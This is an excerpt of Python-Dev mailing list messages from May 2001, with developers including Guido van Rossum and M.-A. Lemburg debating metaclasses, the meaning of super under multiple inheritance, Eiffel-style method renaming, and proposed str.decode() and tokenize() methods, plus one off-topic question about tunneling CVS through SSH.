maybe you could repost your secret message to comp.lang.python ;-) Cheers /F From mal at lemburg.com Thu May 3 11:05:41 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 11:05:41 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid> Message-ID: <3AF11F65.5CBF508C@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Here's some sample output (Netscape can unscramble this BTW): > > heh. just discovered that outlook express can deal with this > too -- but only if the message comes from the usenet. > > on ordinary mail, the "unscramble rot13" menu entry is disabled > (too much usability testing?) > > maybe you could repost your secret message to comp.lang.python ;-) It wasn't all that secret: I simply cut&pasted the first two paragraphs of the message through the codec. There was also an inaccuracy in the posting: the codec still produces Unicode (by virtue of using the charmap codec as basis). Still, it serves as nice example of what str.decode() and str.encode() can be used for and also demonstrates how easy it is to install new codecs. I think I'll repost it to c.l.p though -- with a new secret attached to it ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Thu May 3 16:26:22 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:26:22 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200." 
<3AF10D91.802C8555@lemburg.com> References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com> > We are actually trying to turn classes into types here :-) Yes! Wait till you see my next batch of checkins. :-) > Really, I think that we could resolve this issue by not inheriting > from meta-classes. DictType is a creation of the meta-class > TypeType. I'm not calling these instances to prevent additional > confusion. The root of the problem is that for some reason there > is belief that DictType should implicitly inherit attributes and > methods from TypeType. If we simply say that there is no implicit > inheritance (only explicit one), then these problems should go > away. Sorry, you still seem to be confused about this. As I tried to explain before, DictType does not *inherit* from TypeType, but it is an *instance* of TypeType. TypeType defines a __repr__() method for all its instances. This is needed so that repr(DictType) returns "". It is *not* inherited from TypeType! If DictType were to inherit from something, it would inherit from the (not yet existing) ObjectType. ObjectType would have a __repr__ method too: it returns "". But this method is overridden by DictType, so doesn't come into play. Requiring explicit inheritance (whatever that may be) won't fix the problem. > Some of these ideas are burried in the "super" part of this > thread. Unfortunately this concept doesn't go very far since > Python has multiple inheritance and thus the term "super" > (referring to the class' single base class) is not well-defined. Not true. While super can't always refer to a single class, the use of super can be completely well-defined in an unambiguous way. 
Given class D(A, B, C): def foo(self): super.foo(self) "super.foo" is whatever would be called in D1 if we changed the class hierarchy as follows: class D1(A, B, C): pass class D(D1): def foo(self): D1.foo(self) The problem with super is not that it isn't well-defined. Its problem is that it's not enough to do what you want. In some situations involving multiple inheritance, it can be essential to be able to "merge" methods of the same name defined in each of the base classes, e.g. class C(A, B): def save(self): A.save(self) B.save(self) So we can't use super as an argument to abandon explicitly naming the base class of base methods. Out of the proposed spellings that I can remember: B.save(self) # current Python B.__dict__['save'](self) # ditto, butt ugly B::save(self) # C++ B._.save(self) # Don Beaudry B.instanceMethods.save(self) # ??? I still like current Python best! > As Jim mentioned in his reply to Thomas' question, SmallTalk > has two parallel hierarchies. One for the classes and one for > the meta-classes. If we follow the same path in Python and > keep the two well separated, I think we can resolve many of > the issues which are currently showing up. Yeah, but this is not the path that Python has already taken (and which has been beaten further by Jim Fulton's ExtensionClasses). Python's path is "turtles all the way down". See also my old head-exploding metaclasses paper. > To link the two hierarchies together we don't need a "super" > concept, but instead a way to reach the meta-class in charge > of a class, say "klass.__creator__". Your confusion between the "isInstanceOf" and "isInheritedFrom" relationships seems really deep! Super relates to inheritance. Metaclasses relate to instantiation (of the class, as an instance of the metaclass). > Note that there's another issue hiding in all this and again > this is due to multiple inheritance: which meta-class is in > charge of a class which is derived from two classes having > different meta-classes ?
> > meta1 --> o klass1 > o klass1a > o klass1b > meta2 --> o klass2 > o klass2a > o klass2b > > class klass3(klass1a, klass2b): > ... > > I think there's no clean way to resolve this, so I'd suggest > to simply rule this out and declare it illegal (class can > only be based on classes having the same meta-class). Unfortunately, again thanks to Jim Fulton, we can't rule this out, because this is actually used by ExtensionClasses. The rule (as I interpret it) gives the first base class control; if the first base class is a standard class, it looks if any of the other base classes are not standard classes, and if so, gives control to the first such base class. Another way to say this is that the first base class that has a non-standard metaclass gets control. (ExtensionClasses implements an additional rule where it requires all except one of the base classes to define no instance variables. This is an example of the importance of metaclasses done right: the metaclass has control over such issues. I don't think that Smalltalk's metaclasses have this much control -- you pretty much have a 1-1 correspondence between class and metaclass. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 3 16:28:03 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:28:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200." <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com> > Guido: > > > Actually, I think that what's in the __dict__ is just perfect > > I was thinking of backwards compatibility for people who > are hacking the __dict__ of a class directly. Depending on how they hack it, it may still work. > If you don't care about that, the problem is simpler. 
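Python 3 eventually settled the "which metaclass is in charge" question with a rule of its own. It selects the most derived metaclass among the bases' metaclasses, and it raises TypeError ("metaclass conflict") when no single metaclass derives from all the others. The sketch below shows both outcomes. It is a modern illustration, not the 2001 ExtensionClass rule described above, and the class names simply mirror the klass1/klass2 diagram.

```python
class Meta1(type):
    pass

class Meta2(type):
    pass

class Klass1(metaclass=Meta1):
    pass

class Klass2(metaclass=Meta2):
    pass

# Unrelated metaclasses: Python refuses to pick one.
try:
    class Klass3(Klass1, Klass2):
        pass
except TypeError as exc:
    conflict_error = str(exc)
else:
    conflict_error = None

# Resolution: supply a metaclass derived from both.
class Meta3(Meta1, Meta2):
    pass

class Klass3(Klass1, Klass2, metaclass=Meta3):
    pass

# When one metaclass already derives from the other, the most derived
# one is chosen automatically, whatever the order of the bases.
class Meta1Sub(Meta1):
    pass

class Klass4(metaclass=Meta1Sub):
    pass

class Klass5(Klass1, Klass4):
    pass
```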
--Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Thu May 3 16:26:51 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 3 May 2001 09:26:51 -0500 Subject: [Python-Dev] OT: CVS access through firewall via SSH Message-ID: <15089.27307.136251.862692@beluga.mojam.com> Python-dev folks, Sorry for the off-topic post, but I'm striking out on the various other sources I've located so far. Since this group seemed to have a love-hate relationship with CVS for awhile I thought maybe someone here would be able to steer me in the right direction. I have to access a CVS repository through a firewall via SSH. That is, to get to "server" I have to tunnel through "firewall" using SSH to port "nnn". Using SSH to establish an interactive session to server is no problem: ssh -p nnn firewall When I'm inside the firewall, I use a CVSROOT that looks like :pserver:montanaro at server:/cvs/projects I need to merge the two bits somehow to come up with a CVSROOT that will do the tunnel automagically. I've tried this: :pserver:montanaro at firewall:nnn/cvs/projects but CVS complains cvs [update aborted]: connect to firewall:2401 failed: Connection refused (port 2401 is the normal CVS port). Any suggestions or pointers? Thanks, Skip From mal at lemburg.com Thu May 3 18:08:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 18:08:30 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com> Message-ID: <3AF1827E.E730F5DE@lemburg.com> Guido van Rossum wrote: > > > We are actually trying to turn classes into types here :-) > > Yes! Wait till you see my next batch of checkins. :-) Looking forward to them :) BTW, can you give a good starting point into all this (code wise and concept wise) ? 
I'd like to play around with these new concepts a little to get a better feeling for the possible issues (I should have done the same for the coercion stuff a year ago: implementing mxNumber I now find that some important hooks are missing :-(). > > Really, I think that we could resolve this issue by not inheriting > > from meta-classes. DictType is a creation of the meta-class > > TypeType. I'm not calling these instances to prevent additional > > confusion. The root of the problem is that for some reason there > > is belief that DictType should implicitly inherit attributes and > > methods from TypeType. If we simply say that there is no implicit > > inheritance (only explicit one), then these problems should go > > away. > > Sorry, you still seem to be confused about this. I think it has to do with terminology: when I say "inherit" I actually mean "the lookup is forwarded to the another object". In that sense, instances inherit from their classes and classes from their base-classes: meta-class M -> o base-class A o class B o instance x = B() Meta-class M controls this "inheritance scheme" and can modify it depending on its needs. Here's a scenario of what I have in mind: In the above picture, say A defines an attribute A.a which is not defined in B or as instance attribute of B(). Querying x.a would then launch this process: 1. x.a -> fails 2. M.__findattr__(x, 'a') is called to find and return the attribute 3. M.__findattr__ asks B for an attribute 'a' -> fails 4. -- " -- asks A -- " -- -> success 5. -- " -- returns the found attribute I know that this is somewhat different under the covers than what's happening now, but the Python programmer will not notice this. It most probably does not work well with the Don Beaudry hook though... so maybe I'm simply on the wrong track here. > As I tried to > explain before, DictType does not *inherit* from TypeType, but it is > an *instance* of TypeType. TypeType defines a __repr__() method for > all its instances.
This is needed so that repr(DictType) returns > "". It is *not* inherited from TypeType! > > If DictType were to inherit from something, it would inherit from the > (not yet existing) ObjectType. ObjectType would have a __repr__ > method too: it returns "". > > But this method is overridden by DictType, so doesn't come into play. > > Requiring explicit inheritance (whatever that may be) won't fix the > problem. With "explicit inheritance" I meant that the programmer has to take care of passing the lookup on to the meta-class, rather than applying some magic which hooks together class and meta- class. > > Some of these ideas are burried in the "super" part of this > > thread. Unfortunately this concept doesn't go very far since > > Python has multiple inheritance and thus the term "super" > > (referring to the class' single base class) is not well-defined. > > Not true. While super can't always refer to a single class, the use > of super can be completely well-defined in an unambiguous way. Given > > class D(A, B, C): > def foo(self): > super.foo(self) > > "super.foo" is whatever would be called in D1 if we changed the class > hierarchy as follows: > > class D1(A, B, C): pass > class D(D1): > def foo(self): > D1.foo(self) Nice trick -- much like the "+0" trick in math ;-) > The problem with super is not that it isn't well-defined. Its problem > is that it's not enough to do what you want. In some situations > involving multiple inheritance, it can be essential to be able to > "merge" methods of the sane name defined in each of the base classes, > e.g. > > class C(A, B): > def save(self): > A.save(self) > B.save(self) > > So we can't use super as an argument to abandon explicitly naming the > base class of base methods. Out of the proposed spellings that I can > remember: > > B.save(self) # current Python > B.__dict__['save'](self) # ditto, butt ugly > B::save(self) # C++ > B._.save(self) # Don Beaudry > B.instanceMethods.save(self) # ??? 
> > I still like current Python best! But it doesn't help us in the very common case of mixin classes, since there neither the method nor, sometimes, even the programmer will know where the base method to call lives. This is why I wrote the basemethod() helper: it looks up the right method at run-time and thus allows writing mixin-classes which override methods of other classes which are only known to the programmer using the mixin and not necessarily to the one writing the mixin. > > As Jim mentioned in his reply to Thomas' question, SmallTalk > > has two parallel hierarchies. One for the classes and one for > > the meta-classes. If we follow the same path in Python and > > keep the two well separated, I think we can resolve many of > > the issues which are currently showing up. > > Yeah, but this is not the path that Python has already taken (and > which has been beaten further by Jim Fulton's ExtensionClasses). > Python's path is "turtles all the way down". See also my old > head-exploding metaclasses paper. I know... I was under the impression, though, that a little breakage under the covers is allowed when moving from type/classes to all types. > > To link the two hierarchies together we don't need a "super" > > concept, but instead a way to reach the meta-class in charge > > of a class, say "klass.__creator__". > > Your confusion between the "isInstanceOf" and "isInheritedFrom" > relationships seems really deep! Super relates to inheritance. > Metaclasses relate to instantiation (of the class, as an instance of > the metaclass). See above... I don't like implicitly binding creation of objects to lookup paths. These two concepts don't belong together, IMHO, since they introduce restrictions which are not really necessary. (I have had some great experiences with loosely coupled object systems and don't want to miss their flexibility anymore.)
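The mixin problem raised here (a mixin author who cannot know which class supplies the "base method") is what Python 3's zero-argument super() later addressed. super() follows the instance's MRO starting just after the class that defines the method, which matches Guido's "D1" reading of super. The sketch below is a modern illustration, not MAL's basemethod() helper, whose code is not shown in the thread. All class names are hypothetical. The second half shows why the search must start from the defining class (option 1 in Tim's later question) rather than from the instance's class.

```python
log = []

class Base:
    def save(self):
        log.append("Base")

class A(Base):
    def save(self):
        log.append("A")
        super().save()

class B(Base):
    def save(self):
        log.append("B")
        super().save()

class SaveMixin(Base):
    # The mixin does not name its successor; super() finds it at run time.
    def save(self):
        log.append("SaveMixin")
        super().save()

class C(SaveMixin, A, B):
    pass

C().save()   # each save() in the diamond runs exactly once

# Pitfall: starting the search from type(self) instead of the defining class.
class Leaf(A):
    def save(self):
        super(type(self), self).save()   # wrong once Leaf is subclassed

class SubLeaf(Leaf):
    pass

try:
    SubLeaf().save()   # super(SubLeaf, self) finds Leaf.save again and again
except RecursionError:
    recursed = True
else:
    recursed = False
```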
> > Note that there's another issue hiding in all this and again > > this is due to multiple inheritance: which meta-class is in > > charge of a class which is derived from two classes having > > different meta-classes ? > > > > meta1 --> o klass1 > > o klass1a > > o klass1b > > meta2 --> o klass2 > > o klass2a > > o klass2b > > > > class klass3(klass1a, klass2b): > > ... > > > > I think there's no clean way to resolve this, so I'd suggest > > to simply rule this out and declare it illegal (class can > > only be based on classes having the same meta-class). > > Unfortunately, again thanks to Jim Fulton, we can't rule this out, > because this is actually used by ExtensionClasses. The rule (as I > interpret it) gives the first base class control; if the first base > class is a standard class, it looks if any of the other base classes > are not standard classes, and if so, gives control to the first such > base class. Another way to say this is that the first base class that > has a non-standard metaclass gets control. Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't it be possible to adapt ExtensionClass to an altered scheme ? > (ExtensionClasses implements an additional rule where it requires all > except one of the base classes to define no instance variables. This > is an example of the importance of metaclasses done right: the > metaclass has control over such issues. I don't think that > Smalltalk's metaclasses have this much control -- you pretty much have > a 1-1 correspondence between class and metaclass. Right: more power to the meta-class :-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paul at pfdubois.com Thu May 3 18:24:40 2001 From: paul at pfdubois.com (Paul F. 
Dubois) Date: Thu, 3 May 2001 09:24:40 -0700 Subject: [Python-Dev] Multiple inheritance Message-ID: Pardon if this is brief and suggestive only, I am on deadlines. Super is a mistaken concept in multiple inheritance languages. Fortunately, Python is not brain-damaged. Its multiple inheritance model can be fixed easily to be fully capable. Here is a suggestive example of implementing the Eiffel model (the only one that is theoretically sound) using "pretend" Python syntax (keyword conservationists might like "import" where I have "rename"): 1. The simple case, X inherits from Y and in defining foo and bar needs to use Y's version: class X (Y rename foo as _sfoo, bar as _sbar ): def foo (self): self._sfoo() myfoostuff Suppose D inherits from B and C, which both inherit from A. A has a method a1 that is redefined in B but not in C. D wishes to use both A's version as inherited via C and B's version. class D (B rename a1 as ba1, C rename a1 as ca1): can now use self.ca1, self.a1 Renaming is also useful where you inherit from a utility class and the lingo is different in the class where you want to use it. E.g. class Window (Tree rename children as subWindows) Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. From donb at abinitio.com Thu May 3 18:47:29 2001 From: donb at abinitio.com (Donald Beaudry) Date: Thu, 03 May 2001 12:47:29 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: Message-ID: <200105031647.MAA25803@localhost.localdomain> "Tim Peters" wrote, > Given that we're using Python's search rules, the ambiguous point remaining > is whether: > > super.f() > > textually contained in a method of class K begins searching with: > > 1) K.__bases__ > > or with: > > 2) self.__class__.__bases__ It can only be 1. Using 2 will only be correct if you are in a method defined on a leaf class. If not in a leaf, the search will find the method you are already in...
recursion is likely to terminate in a stack overflow ;) -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From guido at digicool.com Thu May 3 20:48:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:48:19 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com> From guido at digicool.com Thu May 3 20:50:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:50:30 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com> > Pardon if this is brief and suggestive only, I am on deadlines. No problem. We appreciate it! > Super is a mistaken concept in multiple inheritance languages. Fortunately, > Python is not brain-damaged. Its multiple inheritance model can be fixed > easily to be fully capable. > > Here is a suggestive example of implementing the Eiffel model (the only one > that is theoretically sound) using "pretend" Python syntax (keyword > conservationists might like "import" where I have "rename"): > > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): > def foo (self): > self._sfoo() > myfoostuff Nice! This is similar to Jeremy's favorite way of spelling "super": class X(Y): Yfoo = Y.foo def foo(self): self.Yfoo() myfoostuff > Suppose D inherits from B and C, which both inherit from A. > A has a method a1 that is redefined in B but not in C. > D wishes to use both A's version as inherited via C and B's version. 
> > class D (B rename a1 as ba1, C rename a1 as ca1): > > can now use self.ca1, self.a1 > > Renaming is also useful where you inherit from a utility class and the lingo > is different in the class where you want to use it. E.g. class Window (Tree > rename children as subWindows) > > Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. Yes. --Guido van Rossum (home page: http://www.python.org/~guido/) From jepler at inetnebr.com Thu May 3 20:17:16 2001 From: jepler at inetnebr.com (Jeff Epler) Date: Thu, 3 May 2001 13:17:16 -0500 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010503131714.D21814@inetnebr.com> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > class X (Y rename foo as _sfoo, > bar as _sbar > ): Why not let us spell this as: class X(Y): from Y import foo as _sfoo, bar as _sbar ... Of course, then you can spell inheritance as class X: from Y import * Right? :) Jeff From nas at python.ca Thu May 3 21:05:37 2001 From: nas at python.ca (Neil Schemenauer) Date: Thu, 3 May 2001 12:05:37 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500 References: <20010503131714.D21814@inetnebr.com> Message-ID: <20010503120537.A13708@glacier.fnational.com> Jeff Epler wrote: > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): > > Why not let us spell this as: > class X(Y): > from Y import foo as _sfoo, bar as _sbar > ... This already has a meaning in Python. Paul's suggested syntax is pretty neat, IMHO. 
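Today's Python has no rename clause, but the class-attribute aliasing Guido mentions (Yfoo = Y.foo) covers Paul's diamond case. The sketch below uses the thread's names A, B, C, D, a1, ba1 and ca1 for illustration only. One difference from Eiffel's rename is that the original name a1 stays visible, resolved through D's MRO.

```python
class A:
    def a1(self):
        return "A.a1"

class B(A):
    def a1(self):          # B redefines a1
        return "B.a1"

class C(A):
    pass                   # C inherits A.a1 unchanged

class D(B, C):
    ba1 = B.a1             # B's version under a new name
    ca1 = C.a1             # C.a1 resolves to A.a1

    def both(self):
        return (self.ba1(), self.ca1())

d = D()
```

The aliases are bound when the class statement runs, so later monkey-patching of B.a1 would not be reflected in D.ba1. That is one reason a language-level rename is cleaner.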
Neil From trentm at ActiveState.com Thu May 3 21:39:27 2001 From: trentm at ActiveState.com (Trent Mick) Date: Thu, 3 May 2001 12:39:27 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700 References: <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com> Message-ID: <20010503123927.B30837@ActiveState.com> On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote: > Jeff Epler wrote: > > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > > class X (Y rename foo as _sfoo, > > > bar as _sbar > > > ): > > > > Why not let us spell this as: > > class X(Y): > > from Y import foo as _sfoo, bar as _sbar > > ... > > This already has a meaning in Python. Paul's suggested syntax is > pretty neat, IMHO. Ditto but how to you separate the "rename" lists for multiple inheritance? class X (Y rename foo as _sfoo, bar as _sbar; Z): pass ^---- what to use here How about: class X(Y, Z): from Y inherit foo as _yfoo, bar as _ybar from Z inherit foo as _zfoo, bar as _zbar Hmmmmm. Don't know if I like that either. Just throwing out ideas. Trent -- Trent Mick TrentM at ActiveState.com From greg at cosc.canterbury.ac.nz Fri May 4 06:25:08 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:25:08 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF1827E.E730F5DE@lemburg.com> Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I think it has to do with terminology: when I say "inherit" > I actually mean "the lookup is forwarded to the another object". Some OO languages munge together the instance and inheritance relationships, but Python isn't one of them. Using terminology that way in the context of Python is guaranteed to cause massive confusion! 
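Guido's distinction between "is an instance of" and "inherits from" can be checked directly in today's Python 3. In the short sketch below, Meta, Base and Klass are hypothetical names. A method defined on a metaclass is visible on the class, because the class is an instance of the metaclass, but the class's own instances do not inherit it. For the same reason, repr(dict) comes from type.__repr__ and not from dict.__repr__.

```python
class Meta(type):
    def describe(cls):
        return f"class {cls.__name__} made by {type(cls).__name__}"

class Base:
    def greet(self):
        return "hello from Base"

class Klass(Base, metaclass=Meta):
    pass

obj = Klass()

# Inheritance: obj finds greet() by walking Klass.__mro__ (Klass, Base, object).
inherited = obj.greet()

# Instantiation: Klass is an instance of Meta, so Meta's methods work on Klass...
described = Klass.describe()

# ...but they are not part of Klass's MRO, so instances of Klass cannot see them.
instance_sees_meta = hasattr(obj, "describe")

# dict is an instance of type, so repr(dict) uses type.__repr__,
# while dict.__repr__ formats dict *instances*.
class_repr = repr(dict)
instance_repr = repr({"a": 1})
```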
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Fri May 4 06:58:20 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:58:20 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz> pf at artcom-gmbh.de (Peter Funk): > * People will confuse this with calling > MyBaseClass.__getitem__(....) Given type/class/instance unification, that's exactly how it'll be implemented. So it's not confusion, it's insightful understanding! > This '::' operator is not at all that ugly Well, that's a matter of opinion. But I'll concede that it's less ugly than something like @ or $. But in any case, it's not going to mean quite the same thing in Python as it does in C++, so it might just confuse C++ people. What exactly *is* it going to mean in Python, anyway? Will it have a corresponding __magic__ method, and if so, what will it be called? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From mal at lemburg.com Fri May 4 10:40:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 10:40:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> Message-ID: <3AF26AF1.780462E2@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I think it has to do with terminology: when I say "inherit" > > I actually mean "the lookup is forwarded to the another object". 
> > Some OO languages munge together the instance and inheritance > relationships, but Python isn't one of them. Using terminology > that way in the context of Python is guaranteed to cause > massive confusion! But that's exactly what I am trying to do here: separate the notion of how lookups work (inheritance) from how objects are created (instantiation) ! In Python, instantiation binds the new object to the creating class and all failing lookups are directed from the object to the class. OTOH, the class - base-class lookup relationship doesn't have anything to do with the creation of objects -- classes are simply bound to their base-classes per definition of the class in the sense that failing lookups are directed to the base-classes. Classes themselves are created by meta-classes. The lookup strategy between the two is defined by the meta-class. What I'm arguing for is that meta-classes should get complete control over how lookups and object creation are done. However, this will only be possible by breaking the current automatic lookup scheme at the meta-class - class boundary since otherwise you'd run into endless loops during lookups (e.g. for many of the __xxx__ methods). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 4 11:04:08 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 11:04:08 +0200 Subject: [Python-Dev] "".tokenize() ? Message-ID: <3AF27088.DE495210@lemburg.com> Gustavo Niemeyer submitted a patch which adds a tokenize-like method to strings and Unicode: "one, two and three".tokenize([",", "and"]) -> ["one", " two ", "three"] I like this method -- should I review the code and then check it in ? PS: Haven't gotten any response regarding the .decode() method yet... should I take this as "no objections" ?
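The proposed tokenize() semantics (cut at every occurrence of any separator substring) can be expressed with the standard re module, which is the argument the replies make. The sketch below is modern Python 3, and the function names are hypothetical. Trying longer separators first is an added assumption, not part of the proposal. Unlike the proposal's example output, re.split keeps whitespace adjacent to a separator, so the last piece comes back as " three" unless it is stripped.

```python
import re

def tokenize(string, seps):
    # Cut at every occurrence of any separator substring.
    # re.escape() keeps separators such as "." or "|" literal; sorting by
    # length makes a longer separator win over a shorter prefix of it.
    pattern = "|".join(map(re.escape, sorted(seps, key=len, reverse=True)))
    return re.split(pattern, string)

def words_except(string, ignore):
    # The other reading of the request: keep \w+ words not listed in `ignore`.
    return [word for word in re.findall(r"\w+", string) if word not in ignore]

pieces = tokenize("one, two and three", [",", "and"])
```

Plain substring splitting also cuts inside words ("band" contains "and"). A word-based variant avoids that but discards the text between words.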
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 11:57:19 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 11:57:19 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff> mal wrote: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1. method bloat. not exactly something you do every day, and when you do, it's a one-liner: def tokenize(string, ignore): [word for word in re.findall("\w+", string) if not word in ignore] > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? -0. method bloat. we don't have asfloat methods on integers and asint methods on strings either... Cheers /F From mal at lemburg.com Fri May 4 12:16:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 12:16:16 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> Message-ID: <3AF28170.399C2A5@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1. method bloat. 
not exactly something you do every day, and > when you do, it's a one-liner: > > def tokenize(string, ignore): > [word for word in re.findall("\w+", string) if not word in ignore] This is not the same as what .tokenize() does: it cuts at each occurrence of a substring rather than words as in your example (although I must say that list comprehension looks cool ;-). > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > -0. method bloat. we don't have asfloat methods on integers and > asint methods on strings either... Well, we already have .encode() which interfaces to PyString_Encode(), but no Python API for getting at PyString_Decode(). This is what .decode() is for. Depending on the codecs you use, these two methods can be very useful, e.g. for "fixing" line-endings or hexifying strings. The codec concept can be used for far more applications than just converting from and to Unicode. About rich method APIs in general: I like having rich method APIs, since they make life easier (you don't have to reinvent the wheel every time you want a common job to be done). IMHO, too many methods can never hurt, but I'm probably alone with that POV. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 12:50:06 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 12:50:06 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com> Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff> mal wrote: > > > "one, two and three".tokenize([",", "and"]) > > > -> ["one", " two ", "three"] > > > > > > I like this method -- should I review the code and then check it in ? > > > > -1. method bloat.
